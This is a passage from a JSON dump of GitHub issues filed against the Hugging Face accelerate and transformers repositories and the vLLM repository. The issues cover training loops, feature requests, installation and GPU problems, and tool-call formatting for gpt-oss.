targets)\n accelerator.backward(loss)\n optimizer.step()\n scheduler.step()\n optimizer.zero_grad()`\n\nand\n`for batch in training_dataloader:\n with accelerator.accumulate(model):\n optimizer.zero_grad()\n inputs, targets = batch\n outputs = model(inputs)\n loss = loss_function(outputs, targets)\n accelerator.backward(loss)\n optimizer.step()\n scheduler.step()\n `\n\nI want to know whether the two situations will yield the same result. During gradient accumulation training, when the model needs to update the parameters and `accelerate.sync_gradients=True`, will using the second method clear the gradients, causing the gradient accumulation to be incorrect, so that at this point there is only one sample?", "url": "https://github.com/huggingface/accelerate/issues/3836", "state": "closed", "labels": [], "created_at": "2025-11-10T03:11:21Z", "updated_at": "2025-12-20T15:24:00Z", "comments": 3, "user": "polestarss" }, { "repo": "huggingface/transformers", "number": 42113, "title": "Add AutoMergeAdapters: Official Utility to Combine Multiple LoRA Adapters into One Unified Model", "body": "### Feature request\n\nIntroduce a new built-in class AutoMergeAdapters to the Transformers/PEFT ecosystem that enables users to merge multiple LoRA adapters trained on different domains or datasets into a single model.\n\nThis feature simplifies the process of creating multi-domain fine-tuned models for inference and deployment, without manual merging scripts\n\n### Motivation\n\nToday, users can fine-tune models with LoRA adapters easily using PEFT, but they face a major bottleneck when trying to combine more than one adapter.\n\nCurrent limitations:\n\nOnly one LoRA adapter can be merged using merge_and_unload()\n\nManual merges are error-prone and undocumented\n\nModel config alignment must be handled manually\n\nNo built-in CLI or user-friendly API for adapter composition\n\nA high-level API for multi-adapter merging would:\n\nPromote adapter reusability across domains\n\nSimplify deployment of multi-domain, multi-skill models\n\nReduce code duplication across community projects\n\n### Your contribution\n\nI would like to implement this feature and contribute the following:\n\nDevelop the AutoMergeAdapters class under src/transformers/adapters/auto_merge_adapters.py to support merging multiple LoRA adapters with optional weighted combination and compatibility validation.\n\nExtend transformers-cli by adding a new merge-adapters command for CLI-based merging and model export.\n\nAdd unit and integration tests in tests/adapters/test_auto_merge_adapters.py to ensure correctness for weighted merges, config mismatches, and adapter integrity.\n\nProvide documentation including a usage guide and a sample notebook under examples/adapters/merge_multiple_adapters.ipynb.\n\nPublish a demo merged model to the Hugging Face Hub for reproducibility and reference.\n\nOpen a clean, well-tested PR and iterate based on maintainer feedback.\n\nHappy to start implementation once the approach is approved. Looking forward to guidance if any adjustments are required.", "url": "https://github.com/huggingface/transformers/issues/42113", "state": "closed", "labels": [ "Feature request" ], "created_at": "2025-11-09T18:43:20Z", "updated_at": "2025-11-10T16:58:34Z", "comments": 1, "user": "3015pavan" }, { "repo": "huggingface/transformers", "number": 42111, "title": "Add thinking-budget support (max_thinking_tokens) for reasoning-capable chat models", "body": "### Feature request\n\nA built-in way to cap how many tokens a reasoning model spends inside its `` \u2026 `` block. Today, we can only control the total response length via ``max_new_tokens``. No parameter limits the internal reasoning segment when ``enable_thinking=True``.\n\n### Motivation\n\n- Reasoning models (e.g., Qwen3 series) often produce very long thought blocks, which can blow past latency budgets before the final answer starts.\n- Users need a simple, model-agnostic control to bound that \u201cthinking\u201d cost without disabling reasoning entirely.\n- The Qwen docs (https://qwen.readthedocs.io/en/latest/getting_started/quickstart.html#thinking-budget) already describe a brute-force approach (two-step generation) to implement \u201cthinking budgets\u201d.\n\n### Your contribution\n\nI want to submit a PR that:\n\n- Extends ``GenerationConfig`` with:\n``max_thinking_tokens``: integer budget for reasoning tokens.\n``begin_thinking_token_id / end_thinking_token_id``: marker IDs so generation knows where the thinking span begins/ends.\n- Add a ``MaxThinkingTokensLogitsProcessor`` that watches the active ```` block. Once the budget is reached, it forces end_thinking_token_id, ensuring the model exits reasoning and continues with the final response.\n- Document the new parameter in reasoning-model guides (EXAONE, CWM, etc.) and show how to wire the thinking-token IDs until configs do it automatically.\n- Provide unit coverage so ``_get_logits_processor`` injects the new processor whenever the config is fully specified.", "url": "https://github.com/huggingface/transformers/issues/42111", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-11-09T10:09:11Z", "updated_at": "2025-11-09T10:09:11Z", "comments": 0, "user": "AndresAlgaba" }, { "repo": "vllm-project/vllm", "number": 28362, "title": "[Usage]: Can't get vLLM to run on an Intel 125H with XPU and Arc graphics", "body": "### Your current environment\n\n```text\n\nCollecting environment information... \n============================== \n System Info \n============================== \nOS : Ubuntu 24.04.3 LTS (x86_64) \nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0 \nClang version : Could not collect \nCMake version : version 4.1.2 \nLibc version : glibc-2.39 \n \n============================== \n PyTorch Info \n============================== \nPyTorch version : 2.8.0+xpu \nIs debug build : False ", "url": "https://github.com/vllm-project/vllm/issues/28362", "state": "open", "labels": [ "usage", "intel-gpu" ], "created_at": "2025-11-09T09:45:05Z", "updated_at": "2025-11-12T00:19:39Z", "comments": 2, "user": "phlibi" }, { "repo": "vllm-project/vllm", "number": 28350, "title": "[Doc]: Running VLLM via Docker Swarm With Support for Tensor Parallelism", "body": "### \ud83d\udcda Running VLLM via Docker Swarm With Support for Tensor Parallelism\n\nThere's no documentation that I have found outlining how to run VLLM in a docker swarm when utilizing tensor parallelism. The issue is that ```ipc=host``` is not an available option within docker swarm. Consulting the AI feature on the VLLM website suggests to use the ```shm``` option which is available to swarm, but this produces continued failures on startup.\n\nPlease advise how to run VLLM via docker swarm utilizing tensor parallelism. thx\n\n", "url": "https://github.com/vllm-project/vllm/issues/28350", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-11-08T21:11:15Z", "updated_at": "2025-11-19T16:37:31Z", "comments": 2, "user": "ep5000" }, { "repo": "vllm-project/vllm", "number": 28348, "title": "[Usage]: Does vllm support max_pixels in prompt on Qwen3-VL reasoning?", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nI want to run inference of Qwen3-VL-A3B-Instruct, I tried to set max_pixels but it doesn't work.\n\nimport json\nimport base64\nimport requests\nimg_path = r\".\\images\\MMMU\\735_1.jpg\"\nbase64_str = base64.b64encode(open(img_path, 'rb').read()).decode()\nurl = \"http://71.10.29.136:8000/v1/chat/completions\"\npayload = json.dumps(\n {\n \"model\": \"qwen3-vl-30b\",\n \"messages\": [\n {\n \"role\": \"system\",\n \"content\": \"\"\n },\n {\n \"role\": \"user\",\n \"content\": [\n {\n \"type\": \"text\",\n \"text\": \"Question: \"\n },\n {\n \"type\": \"image_url\",\n \"image_url\": {\n \"url\": f\"data:image/jpg;base64,{base64_str}\"\n },\n \"max_pixels\": 192 * 96 ## this is not work.... ##\n },\n {\n \"type\": \"text\",\n \"text\": \" How does the green and photosynthesising mistletoe impact the tree it is hosting? Options:\\\\nA. It will grow down into the roots and kill the tree.\\\\nB. Mistletoe is beneficial and increases the growth of the plant.\\\\nC. It just uses the tree for support and does not damage it.\\\\nD. I don't know and don't want to guess.\\\\nE. It has a very damaging impact on the health of the plant but localised to the place of infection.\\\\n Please select the correct answer from the options above. \\\\n Only answer with the option letter, e.g. A, B, C, D, E, F, G, H, I. *DO NOT output any other information*. \\\\n\"\n }\n ]\n }\n ],\n \"n\": 1,\n \"top_p\": 0.001,\n \"top_k\": 1,\n \"temperature\": 0.01,\n \"max_tokens\": 8192\n }\n)\n\nheaders = {\n 'Content-Type': 'application/json',\n 'Authorization': 'Bearer EMPTY'\n}\n\nresponse = requests.request(\"POST\", url, headers=headers, data=payload)\nprint(response.text)\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28348", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-08T16:06:07Z", "updated_at": "2025-11-08T16:56:17Z", "comments": 1, "user": "leijie-ww" }, { "repo": "vllm-project/vllm", "number": 28344, "title": "[Usage]: Function calling Request's sampling_params.structured_outputs is None?", "body": "\n\nHi, I used openai server API to build a LLM backend when I tried to deploy a MCP server. I discovered that the prompt of vllm engine combined system prompt, tool lists and user prompt. but i saw sampling_params.structured_outputs is None. Although the result seemed correct\uff0c I think it's important to use structured output when generating function calling.But why not use structured output when generate JSON? Please explain\uff0cthanks a lot.\n\nBelow start a vllm backend.\n```\npython -m vllm.entrypoints.openai.api_server \\\n --model /workspace/models/qwen-2.5B/models--Qwen--Qwen2.5-1.5B-Instruct/snapshots/989aa7980e4cf806f80c7fef2b1adb7bc71aa306/ \\\n --served-model-name \"qwen-2.5b\" \\\n --port 8000 \\\n --trust-remote-code \\\n --enable-auto-tool-choice \\\n --tool-call-parser hermes\n```\n\nBelow is input of vllm engine.\n```\n(APIServer pid=703600) > /workspace/vllm/vllm/entrypoints/openai/serving_chat.py(326)create_chat_completion()\n(APIServer pid=703600) -> generator = self.engine_client.generate(\n(APIServer pid=703600) ['<|im_start|>system\\nYou are Qwen, created by Alibaba Cloud. You are a helpful assistant.\\n\\n# Tools\\n\\nYou may call one or more functions to assist with the user query.\\n\\nYou are provided with function signatures within XML tags:\\n\\n{\"type\": \"function\", \"function\": {\"name\": \"weather\", \"description\": \"\u57ce\u5e02\u5929\u6c14\u67e5\u8be2\", \"parameters\": {\"type\": \"object\", \"properties\": {\"city\": {\"type\": \"string\"}}, \"required\": [\"city\"]}}}\\n{\"type\": \"function\", \"function\": {\"name\": \"stock\", \"description\": \"\u80a1\u7968\u4ef7\u683c\u67e5\u8be2\", \"parameters\": {\"type\": \"object\", \"properties\": {\"code\": {\"type\": \"string\"}}, \"required\": [\"code\"]}}}\\n\\n\\nFor each function call, return a json object with function name and arguments within XML tags:\\n\\n{\"name\": , \"arguments\": }\\n<|im_end|>\\n<|im_start|>user\\n\u67e5\u8be2\u5317\u4eac\u5929\u6c14\u548c\u8d35\u5dde\u8305\u53f0\u80a1\u4ef7<|im_end|>\\n<|im_start|>assistant\\n']\n(Pdb) sampling_params.structured_outputs\n(Pdb) sampling_params\n(APIServer pid=703600) SamplingParams(n=1, presence_penalty=0.0, frequency_penalty=0.0, repetition_penalty=1.1, temperature=0.7, top_p=0.8, top_k=20, min_p=0.0, seed=None, stop=[], stop_token_ids=[], bad_words=[], include_stop_str_in_output=False, ignore_eos=False, max_tokens=32549, min_tokens=0, logprobs=None, prompt_logprobs=None, skip_special_tokens=False, spaces_between_special_tokens=True, truncate_prompt_tokens=None, **structured_outputs=None,** extra_args=None)\n```\nBelow is output of vllm engine.\n```\n(APIServer pid=703600) > /workspace/vllm/vllm/entrypoints/openai/serving_chat.py(1290)chat_completion_full_generator()\n(APIServer pid=703600) -> async for res in result_generator:\n(Pdb) final_res\n(APIServer pid=703600) RequestOutput(request_id=chatcmpl-573ea011c8894432bf8aa9d1468cae60, prompt='<|im_start|>system\\nYou are Qwen, created by Alibaba Cloud. You are a helpful assistant.\\n\\n# Tools\\n\\nYou may call one or more functions to assist with the user query.\\n\\nYou are provided with function signatures within XML tags:\\n\\n{\"type\": \"function\", \"function\": {\"name\": \"weather\", \"description\": \"\u57ce\u5e02\u5929\u6c14\u67e5\u8be2\", \"parameters\": {\"type\": \"object\", \"properties\": {\"city\": {\"type\": \"string\"}}, \"required\": [\"city\"]}}}\\n{\"type\": \"function\", \"function\": {\"name\": \"stock\", \"description\": \"\u80a1\u7968\u4ef7\u683c\u67e5\u8be2\", \"parameters\": {\"type\": \"object\", \"properties\": {\"code\": {\"type\": \"string\"}}, \"required\": [\"code\"]}}}\\n\\n\\nFor each function call, return a json object with function name and arguments within XML tags:\\n\\n{\"name\": , \"arguments\": }\\n<|im_end|>\\n<|im_start|>user\\n\u67e5\u8be2\u5317\u4eac\u5929\u6c14\u548c\u8d35\u5dde\u8305\u53f0\u80a1\u4ef7<|im_end|>\\n<|im_start|>assistant\\n', prompt_token_ids=[151644, 8948, 198, 2610, 525, 1207, 16948, 11, 3465, 553, 54364, 14817, 13, 1446, 525, 264, 10950, 17847, 382, 2, 13852, 271, 2610, 1231, 1618, 825, 476, 803, 5746, 311, 7789, 448, 279, 1196, 3239, 382, 2610, 525, 3897, 448, 729, 32628, 2878, 366, 15918, 1472, 15918, 29, 11874, 9492, 510, 27, 15918, 397, 4913, 1313, 788, 330, 1688, 497, 330, 1688, 788, 5212, 606, 788, 330, 15206, 497, 330, 4684, 788, 330, 99490, 104307, 51154, 497, 330, 13786, 788, 5212, 1313, 788, 330, 1700, 497, 330, 13193, 788, 5212, 8926, 788, 5212, 1313, 788, 330, 917, 9207, 2137, 330, 6279, 788, 4383, 8926, 1341, 3417, 532, 4913, 1313, 788, 330, 1688, 497, 330, 1688, 788, 5212, 606, 788, 330, 13479, 497, 330, 4684, 788, 330, 104023, 97480, 51154, 497, 330, 13786, 788, 5212, 1313, 788, 330, 1700, 497, 330, 13193, 788, 5212, 1851, 788, 5212, 1313, 788, 330, 917, 9207, 2137, 330, 6279, 788, 4383, 1851, 1341, 3417, 532, 522, 15918, 1339, 2461, 1817, 729, 1618, 11, 470, 264, 2951, 1633, 448, 729, 829, 323, 5977, 2878, 220, 151657, 151658, 11874, 9492, 510, 151657, 198, 4913, 606, 788, 366, 1688, 11494, 8066, 330, 16370, 788, 366, 2116, 56080, 40432, 31296, 151658, 151645, 198, 151644, 872, 198, 51154, 68990, 104307, 33108, 102345, 109625, 105281, 151645, 198, 151644, 77091", "url": "https://github.com/vllm-project/vllm/issues/28344", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-08T08:57:17Z", "updated_at": "2025-11-10T07:51:51Z", "comments": 5, "user": "wtr0504" }, { "repo": "vllm-project/vllm", "number": 28340, "title": "[Installation]: Need offline wheel for vLLM 0.11.0rc2 (pip download fails) to deploy qwen3_vl_235b_a22b_instruct_i18n", "body": "### Your current environment\n\nI need to install vLLM 0.11.0rc2 in an offline environment.\nIs there an official wheel (.whl) available for vLLM==0.11.0rc2 that I can download directly?\n\nRunning:\n```\npip download vllm==0.11.0rc2 --pre --extra-index-url https://wheels.vllm.ai/nightly -d wheels\n```\nfails with an error: \n\nLooking in indexes: https://bytedpypi.byted.org/simple/, https://wheels.vllm.ai/nightly\nERROR: Ignored the following yanked versions: 0.2.1\nERROR: Could not find a version that satisfies the requirement vllm==0.11.0rc2 (from versions: 0.0.1, 0.1.0, 0.1.1, 0.1.2, 0.1.3, 0.1.4, 0.1.5, 0.1.6, 0.1.7, 0.2.0, 0.2.1.post1, 0.2.2, 0.2.3, 0.2.4, 0.2.5, 0.2.6, 0.2.7, 0.3.0, 0.3.1, 0.3.2, 0.3.3, 0.4.0, 0.4.0.post1, 0.4.1, 0.4.2, 0.4.3, 0.5.0, 0.5.0.post1, 0.5.1, 0.5.2, 0.5.3, 0.5.3.post1, 0.5.4, 0.5.5, 0.6.0, 0.6.1, 0.6.1.post1, 0.6.1.post2, 0.6.2, 0.6.3, 0.6.3.post1, 0.6.4, 0.6.4.post1, 0.6.5, 0.6.6, 0.6.6.post1, 0.7.0, 0.7.1, 0.7.2, 0.7.3, 0.8.0, 0.8.1, 0.8.2, 0.8.3, 0.8.4, 0.8.5, 0.8.5.post1, 0.9.0, 0.9.0.1, 0.9.1, 0.9.2, 0.10.0, 0.10.1, 0.10.1.1, 0.10.2, 0.11.0, 0.11.1rc6.dev210+g70af44fd1.cu129)\nERROR: No matching distribution found for vllm==0.11.0rc2.\n\n### How you are installing vllm\n\n```sh\npip download vllm==0.11.0rc2 --pre --extra-index-url https://wheels.vllm.ai/nightly -d wheels\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28340", "state": "closed", "labels": [ "installation" ], "created_at": "2025-11-08T06:05:31Z", "updated_at": "2025-11-08T06:08:37Z", "comments": 0, "user": "FateForever0222" }, { "repo": "vllm-project/vllm", "number": 28310, "title": "[Doc]: Update GPU requirements to include AMD gfx1150/gfx1151", "body": "### \ud83d\udcda The doc issue\n\nSummary: The documentation for GPU requirements does not list AMD gfx1150 and gfx1151 architectures, which are now supported.\n\nBackground: Support for AMD gfx1150 and gfx1151 GPUs was added in https://github.com/vllm-project/vllm/pull/25908. The GPU requirements page should be updated to reflect this.\n\nAffected page: https://docs.vllm.ai/en/latest/getting_started/installation/gpu/index.html#requirements\n\nExpected behavior: The GPU requirements page lists AMD gfx1150 and gfx1151 as supported architectures.\n\n\n\n### Suggest a potential alternative/fix\n\nProposed fix: https://github.com/vllm-project/vllm/pull/28308\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28310", "state": "closed", "labels": [ "documentation", "rocm" ], "created_at": "2025-11-07T17:26:47Z", "updated_at": "2025-11-08T03:01:08Z", "comments": 1, "user": "hammmmy" }, { "repo": "huggingface/transformers", "number": 42093, "title": "Mbart decoder ignoring index 0 from labels | index 1 from dec in", "body": "### System Info\n\nI am creating a ocr model using VisionEncoderDecoderModel class by connecting plm vision tower and donut base decoder (mbart model). \n\nI am using teacher forcing method to train the model ( default training and i found out that the model is ignoring index 0 from the target ( index 1 from the decoder_input_ids ). \n\nI read the documentation for mbart and it says lang_code should be the bos for the target labels. but unlike the traditional methods where mbart used for translation task im using it for image - text task. \n\nand when i use the Seq2SeqTrainer to train the model i notice that the model is skipping is index 0 no matter what token is present there. \n\nI made my trainer to print the labels, dec in ( my own shift right just to display ) and pred. this is how it looks: \n\n```python\nlabel: [985, 735, 8, 690, 28264, 1448, 15320, 8, 4467, 18823, 258, 30606, 5965, 2164, 451, 8, 4467, 18823, 35, 2, -100, -100, -100, -100, -100, -100, -100, -100, -100]\ndecin: [2, 985, 735, 8, 690, 28264, 1448, 15320, 8, 4467, 18823, 258, 30606, 5965, 2164, 451, 8, 4467, 18823, 35, 2, 1, 1, 1, 1, 1, 1, 1, 1]\npreds: [735, 8, 690, 28264, 1448, 15320, 8, 4467, 18823, 258, 30606, 5965, 2164, 451, 8, 4467, 18823, 35, 2, 4467, 2, 2, 2, 185, 2, 2, 2, 2]\n\n\nlabel: [15418, 417, 893, 7271, 12, 8, 6583, 13, 46, 6549, 5538, 3632, 388, 8, 3633, 11, 34, 5221, 8, 188, 28, 2234, 8, 22, 11, 8, 26, 8340, 2]\ndecin: [2, 15418, 417, 893, 7271, 12, 8, 6583, 13, 46, 6549, 5538, 3632, 388, 8, 3633, 11, 34, 5221, 8, 188, 28, 2234, 8, 22, 11, 8, 26, 8340]\npreds: [417, 893, 7271, 12, 8, 6583, 13, 46, 6549, 5538, 3632, 388, 8, 3633, 11, 34, 5221, 8, 188, 28, 2234, 8, 22, 11, 8, 26, 8340, 2]\n\n\nlabel: [877, 8, 13, 397, 8, 3038, 10180, 7049, 88, 8, 13, 5348, 9, 36, 208, 123, 11, 12311, 148, 2696, 2, -100, -100, -100, -100, -100, -100, -100, -100]\ndecin: [2, 877, 8, 13, 397, 8, 3038, 10180, 7049, 88, 8, 13, 5348, 9, 36, 208, 123, 11, 12311, 148, 2696, 2, 1, 1, 1, 1, 1, 1, 1]\npreds: [8, 13, 397, 8, 3038, 10180, 7049, 88, 8, 13, 5348, 9, 36, 208, 123, 11, 12311, 148, 2696, 2, 2, 2, 2, 2, 2, 2696, 2, 2]\n```\n\nlets assume that the language code is 0, and thats in the beginning, that will be ignored too. how do i make the model to not ignore the index 0 from the labels? \n\n\n\n\n\n### Who can help?\n\n@ArthurZucker \n@Cyrilvallez \n@yonigozlan \n@molbap \n@zucchini-nlp \n@itazap \n\n### Information\n\n- [x] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nhttps://colab.research.google.com/drive/1nLCDlFyKhqCGu7dhlxJ0JiCRYjG24vbO?usp=sharing\n\n### Expected behavior\n\nI would like the decoder model to not ignore the index 0 from the labels. so that it will be \n\n\"Image\"\n\n ", "url": "https://github.com/huggingface/transformers/issues/42093", "state": "closed", "labels": [ "bug" ], "created_at": "2025-11-07T15:46:08Z", "updated_at": "2025-11-07T16:27:10Z", "comments": 1, "user": "jaaabir" }, { "repo": "vllm-project/vllm", "number": 28292, "title": "[Usage]: Failure to Deploy Llama-3.2-11B-Vision-Instruct Locally via vllm Due to OOM", "body": "### Your current environment\n\nThe output of python collect_env.py\n\n```text\n==============================\n System Info\n==============================\nOS : Ubuntu 20.04.5 LTS (x86_64)\nGCC version : (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0\nClang version : Could not collect\nCMake version : version 3.16.3\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.5.1+cu121\nIs debug build : False\nCUDA used to build PyTorch : 12.1\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.18 (main, Jun 5 2025, 13:14:17) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-5.4.250-2-velinux1u1-amd64-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.4.131\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA A100-SXM4-80GB\nGPU 1: NVIDIA A100-SXM4-80GB\nGPU 2: NVIDIA A100-SXM4-80GB\nGPU 3: NVIDIA A100-SXM4-80GB\nGPU 4: NVIDIA A100-SXM4-80GB\nGPU 5: NVIDIA A100-SXM4-80GB\nGPU 6: NVIDIA A100-SXM4-80GB\nGPU 7: NVIDIA A100-SXM4-80GB\n\nNvidia driver version : 535.129.03\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv_infer.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv_train.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn_infer.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn_train.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops_infer.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops_train.so.8.7.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nByte Order: Little Endian\nAddress sizes: 46 bits physical, 57 bits virtual\nCPU(s): 112\nOn-line CPU(s) list: 0-108\nOff-line CPU(s) list: 109-111\nThread(s) per core: 1\nCore(s) per socket: 28\nSocket(s): 2\nNUMA node(s): 2\nVendor ID: GenuineIntel\nCPU family: 6\nModel: 106\nModel name: Intel(R) Xeon(R) Platinum 8336C CPU @ 2.30GHz\nStepping: 6\nCPU MHz: 2294.608\nBogoMIPS: 4589.21\nHypervisor vendor: KVM\nVirtualization type: full\nL1d cache: 1.3 MiB\nL1i cache: 896 KiB\nL2 cache: 35 MiB\nL3 cache: 54 MiB\nNUMA node0 CPU(s): 0-55\nNUMA node1 CPU(s): 56-111\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Vulnerable: Clear CPU buffers attempted, no microcode; SMT Host state unknown\nVulnerability Retbleed: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced IBRS, IBPB conditional, RSB filling, PBRSB-eIBRS SW sequence\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm 3dnowprefetch cpuid_fault invpcid_single ssbd ibrs ibpb stibp ibrs_enhanced fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves wbnoinvd arat avx512vbmi umip pku ospke avx512_vbmi2 gf", "url": "https://github.com/vllm-project/vllm/issues/28292", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-07T12:01:04Z", "updated_at": "2026-01-06T00:06:43Z", "comments": 5, "user": "LittleLucifer1" }, { "repo": "huggingface/transformers", "number": 42086, "title": "Does Trainer uses grad scaler for training?", "body": "I am not able to see the grad scaler usage in Trainer code. If not using it then I need to understand how are we using mixed precision training with fp16 precision without grad scaler.", "url": "https://github.com/huggingface/transformers/issues/42086", "state": "closed", "labels": [], "created_at": "2025-11-07T10:10:16Z", "updated_at": "2025-11-13T07:58:33Z", "comments": 2, "user": "quic-meetkuma" }, { "repo": "vllm-project/vllm", "number": 28283, "title": "[Bug]: nccl stuck issue", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nI am using a docker container for vLLM. I noticed that when I use `nvidia/cuda:13.0.X-cudnn-devel-ubuntu24.04` with `tp > 1`, it gets stuck here: `INFO 11-07 09:24:25 [pynccl.py:111] vLLM is using nccl==2.27.5`. But it works fine with `nvidia/cuda:12.9.X-cudnn-devel-ubuntu24.04` because I assume `12.9` is the current default now.\n\nMy question is: why does the CUDA image version really matter with vLLM? Just asking since I'm not experiencing this with SGLang, where `tp > 1` still works well even if I use either `12.8`, `12.9`, or even `13.0` `nvidia/cuda` image.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28283", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-07T09:36:01Z", "updated_at": "2025-11-07T09:40:17Z", "comments": 1, "user": "seindum" }, { "repo": "vllm-project/vllm", "number": 28262, "title": "[Bug]: [gpt-oss] Responses API incorrect input/output handling", "body": "### Your current environment\n\nAny env\n\n### \ud83d\udc1b Describe the bug\n\nThere is currently an implementation issue with gpt-oss on the Responses API in vLLM. This can be seen clearly in the [test which continues a conversation between API requests here](https://github.com/vllm-project/vllm/blob/4bf56c79cc252d285d0cb4f5edf323f02af735ca/tests/entrypoints/openai/test_response_api_with_harmony.py#L715).\n\nFrom the first request, the model outputs the following tokens (whitespace added for clarity):\n```\n<|channel|>analysis<|message|>\n\tUser asks for weather in Paris today. We have no direct API call yet, but we can use get_weather function. Coordinates for Paris: latitude 48.8566, longitude 2.3522. We'll call get_weather.\n<|end|>\n<|start|>assistant<|channel|>commentary to=functions.get_weather <|constrain|>json<|message|>\n\t{\"latitude\":48.8566,\"longitude\":2.3522}\n<|call|>\n```\nWhen the output items from the first request are passed in as input to the second request, the tokens look like this (whitespace added for clarity):\n```\n<|start|>user<|message|>\n\tWhat's the weather like in Paris today?\n<|end|>\n<|start|>assistant<|message|>\n\tUser asks for weather in Paris today. We have no direct API call yet, but we can use get_weather function. Coordinates for Paris: latitude 48.8566, longitude 2.3522. We'll call get_weather.\n<|end|>\n<|start|>assistant to=functions.get_weather<|channel|>commentary json<|message|>\n\t{\"latitude\":48.8566,\"longitude\":2.3522}\n<|call|>\n<|start|>functions.get_weather<|message|>\n\t20\n<|end|>\n```\n\nWe lose `<|channel|>analysis` on the reasoning message, and we do not set `<|channel|>commentary` on the tool call output ([documentation reference](https://cookbook.openai.com/articles/openai-harmony#handling-tool-calls)).\n\nThere are a lot of edge cases and challenges to properly represent Harmony Message metadata when the Responses API input/output types do not include that metadata, but we can improve on the current implementation. \n\nThe changes we can make are:\n- A reasoning message should use the channel of the message that follows it. For example:\n - The reasoning message prior to a function tool call should be on the commentary channel\n - If the commentary channel is not enabled (no function tools enabled), all reasoning messages are on the analysis channel\n - All other reasoning messages are on the analysis channel\n- Set the content_type for function tools to be `<|constrain|>json` always\n- Input items which are FunctionCallOutput should be set to be on the commentary channel\n- Other types of tool related input types should be on the analysis channel\n\nThese changes should would be made to [serving_responses.py](https://github.com/vllm-project/vllm/blob/main/vllm/entrypoints/openai/serving_responses.py) and [harmony_utils.py](https://github.com/vllm-project/vllm/blob/main/vllm/entrypoints/harmony_utils.py). Similar changes can be done for the chat completions path as well, but that should be out of scope for this issue.\n\nWith the changes described above, gpt-oss should have a significantly reduced error rate when outputting header tokens on longer conversations involving tools. \n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28262", "state": "open", "labels": [ "bug" ], 